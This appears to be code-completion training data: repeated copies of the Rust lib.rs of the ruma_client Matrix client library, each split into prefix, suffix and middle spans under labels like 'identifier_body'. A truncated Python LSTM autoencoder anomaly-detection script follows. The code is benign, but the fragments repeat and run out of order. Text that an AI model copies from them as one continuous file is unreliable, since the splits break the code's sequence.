let mut url = self.0.homeserver_url.clone();
request
.try_into()
.map_err(Error::from)
.into_future()
.and_then(move |hyper_request| {
{
let uri = hyper_request.uri();
url.set_path(uri.path());
url.set_query(uri.query());
if E::METADATA.requires_authentication {
if let Some(ref session) = *data1.session.lock().unwrap() {
url.query_pairs_mut()
.append_pair("access_token", &session.access_token);
} else {
return Err(Error(InnerError::AuthenticationRequired));
}
}
}
Uri::from_str(url.as_ref())
.map(move |uri| (uri, hyper_request))
.map_err(Error::from)
})
.and_then(move |(uri, mut hyper_request)| {
*hyper_request.uri_mut() = uri;
data2.hyper.request(hyper_request).map_err(Error::from)
})
.and_then(|hyper_response| {
E::Response::future_from(hyper_response).map_err(Error::from)
})
}
}
impl<C: Connect> Clone for Client<C> {
fn clone(&self) -> Self {
Self(self.0.clone())
}
}
| {
self.0
.session
.lock()
.expect("session mutex was poisoned")
.clone()
} | identifier_body |
lib.rs | //! Crate `ruma_client` is a [Matrix](https://matrix.org/) client library.
//!
//! # Usage
//!
//! Begin by creating a `Client` type, usually using the `https` method for a client that supports
//! secure connections, and then logging in:
//!
//! ```no_run
//! use futures::Future;
//! use ruma_client::Client;
//!
//! let homeserver_url = "https://example.com".parse().unwrap();
//! let client = Client::https(homeserver_url, None).unwrap();
//!
//! let work = client
//! .log_in("@alice:example.com".to_string(), "secret".to_string(), None)
//! .and_then(|session| {
//! // You're now logged in! Write the session to a file if you want to restore it later.
//! // Then start using the API!
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! You can also pass an existing session to the `Client` constructor to restore a previous session
//! rather than calling `log_in`.
//!
//! For the standard use case of synchronizing with the homeserver (i.e. getting all the latest
//! events), use the `Client::sync`:
//!
//! ```no_run
//! # use futures::{Future, Stream};
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! let work = client.sync(None, None, true).map(|response| {
//! // Do something with the data in the response...
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! The `Client` type also provides methods for registering a new account if you don't already have
//! one with the given homeserver.
//!
//! Beyond these basic convenience methods, `ruma-client` gives you access to the entire Matrix
//! client-server API via the `api` module. Each leaf module under this tree of modules contains
//! the necessary types for one API endpoint. Simply call the module's `call` method, passing it
//! the logged in `Client` and the relevant `Request` type. `call` will return a future that will
//! resolve to the relevant `Response` type.
//!
//! For example:
//!
//! ```no_run
//! # use futures::Future;
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! use std::convert::TryFrom;
//!
//! use ruma_client::api::r0::alias::get_alias;
//! use ruma_identifiers::{RoomAliasId, RoomId};
//!
//! let request = get_alias::Request {
//! room_alias: RoomAliasId::try_from("#example_room:example.com").unwrap(),
//! };
//!
//! let work = get_alias::call(client, request).and_then(|response| {
//! assert_eq!(response.room_id, RoomId::try_from("!n8f893n9:example.com").unwrap());
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
#![deny(
missing_copy_implementations,
missing_debug_implementations,
missing_docs,
warnings
)]
#![warn(
clippy::empty_line_after_outer_attr,
clippy::expl_impl_clone_on_copy,
clippy::if_not_else,
clippy::items_after_statements,
clippy::match_same_arms,
clippy::mem_forget,
clippy::missing_docs_in_private_items,
clippy::mut_mut,
clippy::needless_borrow,
clippy::needless_continue,
clippy::single_match_else,
clippy::unicode_not_nfc,
clippy::use_self,
clippy::used_underscore_binding,
clippy::wrong_pub_self_convention,
clippy::wrong_self_convention
)]
use std::{
convert::TryInto,
str::FromStr,
sync::{Arc, Mutex},
};
use futures::{
future::{Future, FutureFrom, IntoFuture},
stream::{self, Stream},
};
use hyper::{
client::{connect::Connect, HttpConnector},
Client as HyperClient, Uri,
};
#[cfg(feature = "hyper-tls")]
use hyper_tls::HttpsConnector;
#[cfg(feature = "hyper-tls")]
use native_tls::Error as NativeTlsError;
use ruma_api::Endpoint;
use url::Url;
use crate::error::InnerError;
pub use crate::{error::Error, session::Session};
/// Matrix client-server API endpoints.
pub mod api;
mod error;
mod session;
/// A client for the Matrix client-server API.
#[derive(Debug)]
pub struct Client<C: Connect>(Arc<ClientData<C>>);
/// Data contained in Client's Rc
#[derive(Debug)]
struct ClientData<C>
where
C: Connect,
{
/// The URL of the homeserver to connect to.
homeserver_url: Url,
/// The underlying HTTP client.
hyper: HyperClient<C>,
/// User session data.
session: Mutex<Option<Session>>,
}
impl Client<HttpConnector> {
/// Creates a new client for making HTTP requests to the given homeserver.
pub fn new(homeserver_url: Url, session: Option<Session>) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: HyperClient::builder().keep_alive(true).build_http(),
session: Mutex::new(session),
}))
}
/// Get a copy of the current `Session`, if any.
///
/// Useful for serializing and persisting the session to be restored later.
pub fn session(&self) -> Option<Session> {
self.0
.session
.lock()
.expect("session mutex was poisoned")
.clone()
}
}
#[cfg(feature = "tls")]
impl Client<HttpsConnector<HttpConnector>> {
/// Creates a new client for making HTTPS requests to the given homeserver.
pub fn https(homeserver_url: Url, session: Option<Session>) -> Result<Self, NativeTlsError> {
let connector = HttpsConnector::new(4)?;
Ok(Self(Arc::new(ClientData {
homeserver_url,
hyper: { HyperClient::builder().keep_alive(true).build(connector) },
session: Mutex::new(session),
})))
}
}
impl<C> Client<C>
where
C: Connect + 'static,
{
/// Creates a new client using the given `hyper::Client`.
///
/// This allows the user to configure the details of HTTP as desired.
pub fn custom(
hyper_client: HyperClient<C>,
homeserver_url: Url,
session: Option<Session>,
) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: hyper_client,
session: Mutex::new(session),
}))
}
/// Log in with a username and password.
///
/// In contrast to api::r0::session::login::call(), this method stores the
/// session data returned by the endpoint in this client, instead of
/// returning it.
pub fn log_in(
&self,
user: String,
password: String,
device_id: Option<String>,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::session::login;
let data = self.0.clone();
login::call(
self.clone(),
login::Request {
address: None,
login_type: login::LoginType::Password,
medium: None,
device_id,
password,
user,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a guest. In contrast to api::r0::account::register::call(),
/// this method stores the session data returned by the endpoint in this
/// client, instead of returning it.
pub fn register_guest(&self) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::Guest),
password: None,
username: None,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a new user on this server.
///
/// In contrast to api::r0::account::register::call(), this method stores
/// the session data returned by the endpoint in this client, instead of
/// returning it.
///
/// The username is the local part of the returned user_id. If it is
/// omitted from this request, the server will generate one.
pub fn register_user(
&self,
username: Option<String>,
password: String,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::User),
password: Some(password),
username,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Convenience method that represents repeated calls to the sync_events endpoint as a stream.
///
/// If the since parameter is None, the first Item might take a significant time to arrive and
/// be deserialized, because it contains all events that have occured in the whole lifetime of
/// the logged-in users account and are visible to them.
pub fn sync(
&self,
filter: Option<api::r0::sync::sync_events::Filter>, | set_presence: bool,
) -> impl Stream<Item = api::r0::sync::sync_events::Response, Error = Error> {
use crate::api::r0::sync::sync_events;
let client = self.clone();
let set_presence = if set_presence {
None
} else {
Some(sync_events::SetPresence::Offline)
};
stream::unfold(since, move |since| {
Some(
sync_events::call(
client.clone(),
sync_events::Request {
filter: filter.clone(),
since,
full_state: None,
set_presence: set_presence.clone(),
timeout: None,
},
)
.map(|res| {
let next_batch_clone = res.next_batch.clone();
(res, Some(next_batch_clone))
}),
)
})
}
/// Makes a request to a Matrix API endpoint.
pub(crate) fn request<E>(
self,
request: <E as Endpoint>::Request,
) -> impl Future<Item = E::Response, Error = Error>
where
E: Endpoint,
{
let data1 = self.0.clone();
let data2 = self.0.clone();
let mut url = self.0.homeserver_url.clone();
request
.try_into()
.map_err(Error::from)
.into_future()
.and_then(move |hyper_request| {
{
let uri = hyper_request.uri();
url.set_path(uri.path());
url.set_query(uri.query());
if E::METADATA.requires_authentication {
if let Some(ref session) = *data1.session.lock().unwrap() {
url.query_pairs_mut()
.append_pair("access_token", &session.access_token);
} else {
return Err(Error(InnerError::AuthenticationRequired));
}
}
}
Uri::from_str(url.as_ref())
.map(move |uri| (uri, hyper_request))
.map_err(Error::from)
})
.and_then(move |(uri, mut hyper_request)| {
*hyper_request.uri_mut() = uri;
data2.hyper.request(hyper_request).map_err(Error::from)
})
.and_then(|hyper_response| {
E::Response::future_from(hyper_response).map_err(Error::from)
})
}
}
impl<C: Connect> Clone for Client<C> {
fn clone(&self) -> Self {
Self(self.0.clone())
}
} | since: Option<String>, | random_line_split |
lib.rs | //! Crate `ruma_client` is a [Matrix](https://matrix.org/) client library.
//!
//! # Usage
//!
//! Begin by creating a `Client` type, usually using the `https` method for a client that supports
//! secure connections, and then logging in:
//!
//! ```no_run
//! use futures::Future;
//! use ruma_client::Client;
//!
//! let homeserver_url = "https://example.com".parse().unwrap();
//! let client = Client::https(homeserver_url, None).unwrap();
//!
//! let work = client
//! .log_in("@alice:example.com".to_string(), "secret".to_string(), None)
//! .and_then(|session| {
//! // You're now logged in! Write the session to a file if you want to restore it later.
//! // Then start using the API!
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! You can also pass an existing session to the `Client` constructor to restore a previous session
//! rather than calling `log_in`.
//!
//! For the standard use case of synchronizing with the homeserver (i.e. getting all the latest
//! events), use the `Client::sync`:
//!
//! ```no_run
//! # use futures::{Future, Stream};
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! let work = client.sync(None, None, true).map(|response| {
//! // Do something with the data in the response...
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! The `Client` type also provides methods for registering a new account if you don't already have
//! one with the given homeserver.
//!
//! Beyond these basic convenience methods, `ruma-client` gives you access to the entire Matrix
//! client-server API via the `api` module. Each leaf module under this tree of modules contains
//! the necessary types for one API endpoint. Simply call the module's `call` method, passing it
//! the logged in `Client` and the relevant `Request` type. `call` will return a future that will
//! resolve to the relevant `Response` type.
//!
//! For example:
//!
//! ```no_run
//! # use futures::Future;
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! use std::convert::TryFrom;
//!
//! use ruma_client::api::r0::alias::get_alias;
//! use ruma_identifiers::{RoomAliasId, RoomId};
//!
//! let request = get_alias::Request {
//! room_alias: RoomAliasId::try_from("#example_room:example.com").unwrap(),
//! };
//!
//! let work = get_alias::call(client, request).and_then(|response| {
//! assert_eq!(response.room_id, RoomId::try_from("!n8f893n9:example.com").unwrap());
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
#![deny(
missing_copy_implementations,
missing_debug_implementations,
missing_docs,
warnings
)]
#![warn(
clippy::empty_line_after_outer_attr,
clippy::expl_impl_clone_on_copy,
clippy::if_not_else,
clippy::items_after_statements,
clippy::match_same_arms,
clippy::mem_forget,
clippy::missing_docs_in_private_items,
clippy::mut_mut,
clippy::needless_borrow,
clippy::needless_continue,
clippy::single_match_else,
clippy::unicode_not_nfc,
clippy::use_self,
clippy::used_underscore_binding,
clippy::wrong_pub_self_convention,
clippy::wrong_self_convention
)]
use std::{
convert::TryInto,
str::FromStr,
sync::{Arc, Mutex},
};
use futures::{
future::{Future, FutureFrom, IntoFuture},
stream::{self, Stream},
};
use hyper::{
client::{connect::Connect, HttpConnector},
Client as HyperClient, Uri,
};
#[cfg(feature = "hyper-tls")]
use hyper_tls::HttpsConnector;
#[cfg(feature = "hyper-tls")]
use native_tls::Error as NativeTlsError;
use ruma_api::Endpoint;
use url::Url;
use crate::error::InnerError;
pub use crate::{error::Error, session::Session};
/// Matrix client-server API endpoints.
pub mod api;
mod error;
mod session;
/// A client for the Matrix client-server API.
#[derive(Debug)]
pub struct Client<C: Connect>(Arc<ClientData<C>>);
/// Data contained in Client's Rc
#[derive(Debug)]
struct ClientData<C>
where
C: Connect,
{
/// The URL of the homeserver to connect to.
homeserver_url: Url,
/// The underlying HTTP client.
hyper: HyperClient<C>,
/// User session data.
session: Mutex<Option<Session>>,
}
impl Client<HttpConnector> {
/// Creates a new client for making HTTP requests to the given homeserver.
pub fn new(homeserver_url: Url, session: Option<Session>) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: HyperClient::builder().keep_alive(true).build_http(),
session: Mutex::new(session),
}))
}
/// Get a copy of the current `Session`, if any.
///
/// Useful for serializing and persisting the session to be restored later.
pub fn session(&self) -> Option<Session> {
self.0
.session
.lock()
.expect("session mutex was poisoned")
.clone()
}
}
#[cfg(feature = "tls")]
impl Client<HttpsConnector<HttpConnector>> {
/// Creates a new client for making HTTPS requests to the given homeserver.
pub fn https(homeserver_url: Url, session: Option<Session>) -> Result<Self, NativeTlsError> {
let connector = HttpsConnector::new(4)?;
Ok(Self(Arc::new(ClientData {
homeserver_url,
hyper: { HyperClient::builder().keep_alive(true).build(connector) },
session: Mutex::new(session),
})))
}
}
impl<C> Client<C>
where
C: Connect + 'static,
{
/// Creates a new client using the given `hyper::Client`.
///
/// This allows the user to configure the details of HTTP as desired.
pub fn custom(
hyper_client: HyperClient<C>,
homeserver_url: Url,
session: Option<Session>,
) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: hyper_client,
session: Mutex::new(session),
}))
}
/// Log in with a username and password.
///
/// In contrast to api::r0::session::login::call(), this method stores the
/// session data returned by the endpoint in this client, instead of
/// returning it.
pub fn log_in(
&self,
user: String,
password: String,
device_id: Option<String>,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::session::login;
let data = self.0.clone();
login::call(
self.clone(),
login::Request {
address: None,
login_type: login::LoginType::Password,
medium: None,
device_id,
password,
user,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a guest. In contrast to api::r0::account::register::call(),
/// this method stores the session data returned by the endpoint in this
/// client, instead of returning it.
pub fn register_guest(&self) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::Guest),
password: None,
username: None,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a new user on this server.
///
/// In contrast to api::r0::account::register::call(), this method stores
/// the session data returned by the endpoint in this client, instead of
/// returning it.
///
/// The username is the local part of the returned user_id. If it is
/// omitted from this request, the server will generate one.
pub fn register_user(
&self,
username: Option<String>,
password: String,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::User),
password: Some(password),
username,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Convenience method that represents repeated calls to the sync_events endpoint as a stream.
///
/// If the since parameter is None, the first Item might take a significant time to arrive and
/// be deserialized, because it contains all events that have occured in the whole lifetime of
/// the logged-in users account and are visible to them.
pub fn sync(
&self,
filter: Option<api::r0::sync::sync_events::Filter>,
since: Option<String>,
set_presence: bool,
) -> impl Stream<Item = api::r0::sync::sync_events::Response, Error = Error> {
use crate::api::r0::sync::sync_events;
let client = self.clone();
let set_presence = if set_presence {
None
} else {
Some(sync_events::SetPresence::Offline)
};
stream::unfold(since, move |since| {
Some(
sync_events::call(
client.clone(),
sync_events::Request {
filter: filter.clone(),
since,
full_state: None,
set_presence: set_presence.clone(),
timeout: None,
},
)
.map(|res| {
let next_batch_clone = res.next_batch.clone();
(res, Some(next_batch_clone))
}),
)
})
}
/// Makes a request to a Matrix API endpoint.
pub(crate) fn | <E>(
self,
request: <E as Endpoint>::Request,
) -> impl Future<Item = E::Response, Error = Error>
where
E: Endpoint,
{
let data1 = self.0.clone();
let data2 = self.0.clone();
let mut url = self.0.homeserver_url.clone();
request
.try_into()
.map_err(Error::from)
.into_future()
.and_then(move |hyper_request| {
{
let uri = hyper_request.uri();
url.set_path(uri.path());
url.set_query(uri.query());
if E::METADATA.requires_authentication {
if let Some(ref session) = *data1.session.lock().unwrap() {
url.query_pairs_mut()
.append_pair("access_token", &session.access_token);
} else {
return Err(Error(InnerError::AuthenticationRequired));
}
}
}
Uri::from_str(url.as_ref())
.map(move |uri| (uri, hyper_request))
.map_err(Error::from)
})
.and_then(move |(uri, mut hyper_request)| {
*hyper_request.uri_mut() = uri;
data2.hyper.request(hyper_request).map_err(Error::from)
})
.and_then(|hyper_response| {
E::Response::future_from(hyper_response).map_err(Error::from)
})
}
}
impl<C: Connect> Clone for Client<C> {
fn clone(&self) -> Self {
Self(self.0.clone())
}
}
| request | identifier_name |
lib.rs | //! Crate `ruma_client` is a [Matrix](https://matrix.org/) client library.
//!
//! # Usage
//!
//! Begin by creating a `Client` type, usually using the `https` method for a client that supports
//! secure connections, and then logging in:
//!
//! ```no_run
//! use futures::Future;
//! use ruma_client::Client;
//!
//! let homeserver_url = "https://example.com".parse().unwrap();
//! let client = Client::https(homeserver_url, None).unwrap();
//!
//! let work = client
//! .log_in("@alice:example.com".to_string(), "secret".to_string(), None)
//! .and_then(|session| {
//! // You're now logged in! Write the session to a file if you want to restore it later.
//! // Then start using the API!
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! You can also pass an existing session to the `Client` constructor to restore a previous session
//! rather than calling `log_in`.
//!
//! For the standard use case of synchronizing with the homeserver (i.e. getting all the latest
//! events), use the `Client::sync`:
//!
//! ```no_run
//! # use futures::{Future, Stream};
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! let work = client.sync(None, None, true).map(|response| {
//! // Do something with the data in the response...
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! The `Client` type also provides methods for registering a new account if you don't already have
//! one with the given homeserver.
//!
//! Beyond these basic convenience methods, `ruma-client` gives you access to the entire Matrix
//! client-server API via the `api` module. Each leaf module under this tree of modules contains
//! the necessary types for one API endpoint. Simply call the module's `call` method, passing it
//! the logged in `Client` and the relevant `Request` type. `call` will return a future that will
//! resolve to the relevant `Response` type.
//!
//! For example:
//!
//! ```no_run
//! # use futures::Future;
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! use std::convert::TryFrom;
//!
//! use ruma_client::api::r0::alias::get_alias;
//! use ruma_identifiers::{RoomAliasId, RoomId};
//!
//! let request = get_alias::Request {
//! room_alias: RoomAliasId::try_from("#example_room:example.com").unwrap(),
//! };
//!
//! let work = get_alias::call(client, request).and_then(|response| {
//! assert_eq!(response.room_id, RoomId::try_from("!n8f893n9:example.com").unwrap());
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
#![deny(
missing_copy_implementations,
missing_debug_implementations,
missing_docs,
warnings
)]
#![warn(
clippy::empty_line_after_outer_attr,
clippy::expl_impl_clone_on_copy,
clippy::if_not_else,
clippy::items_after_statements,
clippy::match_same_arms,
clippy::mem_forget,
clippy::missing_docs_in_private_items,
clippy::mut_mut,
clippy::needless_borrow,
clippy::needless_continue,
clippy::single_match_else,
clippy::unicode_not_nfc,
clippy::use_self,
clippy::used_underscore_binding,
clippy::wrong_pub_self_convention,
clippy::wrong_self_convention
)]
use std::{
convert::TryInto,
str::FromStr,
sync::{Arc, Mutex},
};
use futures::{
future::{Future, FutureFrom, IntoFuture},
stream::{self, Stream},
};
use hyper::{
client::{connect::Connect, HttpConnector},
Client as HyperClient, Uri,
};
#[cfg(feature = "hyper-tls")]
use hyper_tls::HttpsConnector;
#[cfg(feature = "hyper-tls")]
use native_tls::Error as NativeTlsError;
use ruma_api::Endpoint;
use url::Url;
use crate::error::InnerError;
pub use crate::{error::Error, session::Session};
/// Matrix client-server API endpoints.
pub mod api;
mod error;
mod session;
/// A client for the Matrix client-server API.
#[derive(Debug)]
pub struct Client<C: Connect>(Arc<ClientData<C>>);
/// Data contained in Client's Rc
#[derive(Debug)]
struct ClientData<C>
where
C: Connect,
{
/// The URL of the homeserver to connect to.
homeserver_url: Url,
/// The underlying HTTP client.
hyper: HyperClient<C>,
/// User session data.
session: Mutex<Option<Session>>,
}
impl Client<HttpConnector> {
/// Creates a new client for making HTTP requests to the given homeserver.
pub fn new(homeserver_url: Url, session: Option<Session>) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: HyperClient::builder().keep_alive(true).build_http(),
session: Mutex::new(session),
}))
}
/// Get a copy of the current `Session`, if any.
///
/// Useful for serializing and persisting the session to be restored later.
pub fn session(&self) -> Option<Session> {
self.0
.session
.lock()
.expect("session mutex was poisoned")
.clone()
}
}
#[cfg(feature = "tls")]
impl Client<HttpsConnector<HttpConnector>> {
/// Creates a new client for making HTTPS requests to the given homeserver.
pub fn https(homeserver_url: Url, session: Option<Session>) -> Result<Self, NativeTlsError> {
let connector = HttpsConnector::new(4)?;
Ok(Self(Arc::new(ClientData {
homeserver_url,
hyper: { HyperClient::builder().keep_alive(true).build(connector) },
session: Mutex::new(session),
})))
}
}
impl<C> Client<C>
where
C: Connect + 'static,
{
/// Creates a new client using the given `hyper::Client`.
///
/// This allows the user to configure the details of HTTP as desired.
pub fn custom(
hyper_client: HyperClient<C>,
homeserver_url: Url,
session: Option<Session>,
) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: hyper_client,
session: Mutex::new(session),
}))
}
/// Log in with a username and password.
///
/// In contrast to api::r0::session::login::call(), this method stores the
/// session data returned by the endpoint in this client, instead of
/// returning it.
pub fn log_in(
&self,
user: String,
password: String,
device_id: Option<String>,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::session::login;
let data = self.0.clone();
login::call(
self.clone(),
login::Request {
address: None,
login_type: login::LoginType::Password,
medium: None,
device_id,
password,
user,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a guest. In contrast to api::r0::account::register::call(),
/// this method stores the session data returned by the endpoint in this
/// client, instead of returning it.
pub fn register_guest(&self) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::Guest),
password: None,
username: None,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a new user on this server.
///
/// In contrast to api::r0::account::register::call(), this method stores
/// the session data returned by the endpoint in this client, instead of
/// returning it.
///
/// The username is the local part of the returned user_id. If it is
/// omitted from this request, the server will generate one.
pub fn register_user(
&self,
username: Option<String>,
password: String,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::User),
password: Some(password),
username,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Convenience method that represents repeated calls to the sync_events endpoint as a stream.
///
/// If the since parameter is None, the first Item might take a significant time to arrive and
/// be deserialized, because it contains all events that have occured in the whole lifetime of
/// the logged-in users account and are visible to them.
pub fn sync(
&self,
filter: Option<api::r0::sync::sync_events::Filter>,
since: Option<String>,
set_presence: bool,
) -> impl Stream<Item = api::r0::sync::sync_events::Response, Error = Error> {
use crate::api::r0::sync::sync_events;
let client = self.clone();
let set_presence = if set_presence {
None
} else {
Some(sync_events::SetPresence::Offline)
};
stream::unfold(since, move |since| {
Some(
sync_events::call(
client.clone(),
sync_events::Request {
filter: filter.clone(),
since,
full_state: None,
set_presence: set_presence.clone(),
timeout: None,
},
)
.map(|res| {
let next_batch_clone = res.next_batch.clone();
(res, Some(next_batch_clone))
}),
)
})
}
/// Makes a request to a Matrix API endpoint.
pub(crate) fn request<E>(
self,
request: <E as Endpoint>::Request,
) -> impl Future<Item = E::Response, Error = Error>
where
E: Endpoint,
{
let data1 = self.0.clone();
let data2 = self.0.clone();
let mut url = self.0.homeserver_url.clone();
request
.try_into()
.map_err(Error::from)
.into_future()
.and_then(move |hyper_request| {
{
let uri = hyper_request.uri();
url.set_path(uri.path());
url.set_query(uri.query());
if E::METADATA.requires_authentication |
}
Uri::from_str(url.as_ref())
.map(move |uri| (uri, hyper_request))
.map_err(Error::from)
})
.and_then(move |(uri, mut hyper_request)| {
*hyper_request.uri_mut() = uri;
data2.hyper.request(hyper_request).map_err(Error::from)
})
.and_then(|hyper_response| {
E::Response::future_from(hyper_response).map_err(Error::from)
})
}
}
impl<C: Connect> Clone for Client<C> {
fn clone(&self) -> Self {
Self(self.0.clone())
}
}
| {
if let Some(ref session) = *data1.session.lock().unwrap() {
url.query_pairs_mut()
.append_pair("access_token", &session.access_token);
} else {
return Err(Error(InnerError::AuthenticationRequired));
}
} | conditional_block |
AutoEncoderBasedEvaluation.py | import copy
import numpy as np
import DataLoader
import torch
import seaborn as sns
import matplotlib.pyplot as plt
from scipy import signal
from scipy.signal import find_peaks
from statsmodels import api as sm
from sklearn.preprocessing import MinMaxScaler
from torch import nn
from LstmAutoEncoder import LstmAutoEncoder
from Model import Model
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class LstmAutoEncoderModel(Model):
def __init__(self, windowSize, maxEpoch, paramIndex, learningRate, threshold):
self.windowSize = windowSize
self.maxEpoch = maxEpoch
self.paramIndex = paramIndex
self.learningRate = learningRate
self.threshold = threshold
self.embeddingDim = 128
self.normalData = DataLoader.NormalDataLoader(self.paramIndex, 'train')
self.unstableData = DataLoader.UnstableDataLoader(self.paramIndex, 'test')
self.wantToShuffle = False
self.statistics = {}
def preProcess(self):
print('paramIndex:', self.paramIndex)
stable = self.normalData.data.x_data
# plot distribution [optional]
# sns.distplot(stable, label="train")
# plt.legend()
# plt.show()
# mix max scaler
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
# divide dataset into train set and validation set
trainData, validationData = self.normalData.divideData(stable, self.wantToShuffle)
# remove some data for reshaping
trainDataMissing = trainData.shape[0] % self.windowSize
validationDataMissing = validationData.shape[0] % self.windowSize
if trainDataMissing != 0:
trainData = trainData[: -trainDataMissing]
if validationDataMissing != 0:
validationData = validationData[: -validationDataMissing]
# plot dataset [optional]
print("data shape:", trainData.shape, validationData.shape)
plt.plot(trainData, label="train")
plt.plot(validationData, label="validate")
plt.legend()
# plt.show()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_valid_data.png')
plt.close()
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize) # 12(window)
validationData = validationData.reshape(-1, self.windowSize)
print("data shape:", trainData.shape, validationData.shape)
# collect mean, std
meanOfTrainData, stdOfTrainData = self.collectMeanStd(trainData)
meanOfValidationData, stdOfValidationData = self.collectMeanStd(validationData)
meanOfTrainData += meanOfValidationData
stdOfTrainData += stdOfValidationData
# find cycle of repeated trend
cycle = self.findCycle(stable)
# save statistic values [left tail, right tail, right tail(std), cycle]
self.statistics = {'lowerMean': np.percentile(meanOfTrainData, 5),
'upperMean': np.percentile(meanOfTrainData, 95),
'upperStd': np.percentile(stdOfTrainData, 95), 'cycle': cycle}
# flatten dataset and min-max normalize
trainData = minMaxScaler.transform(trainData.reshape(-1, 1))
validationData = minMaxScaler.transform(validationData.reshape(-1, 1))
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize)
validationData = validationData.reshape(-1, self.windowSize)
trainDataTensor, lengthOfSubsequence, numberOfFeatures = self.convertToTensor(trainData)
validationDataTensor, _, _ = self.convertToTensor(validationData)
return trainDataTensor, validationDataTensor, lengthOfSubsequence, numberOfFeatures
@staticmethod
def findCycle(sequence):
normalizedStable = sequence - np.mean(sequence)
# acf = sm.tsa.acf(normalizedStable, nlags=len(normalizedStable), fft=False) # auto correlation
peaks, _ = find_peaks(normalizedStable.to_numpy().flatten())
if peaks.size < 3:
return None
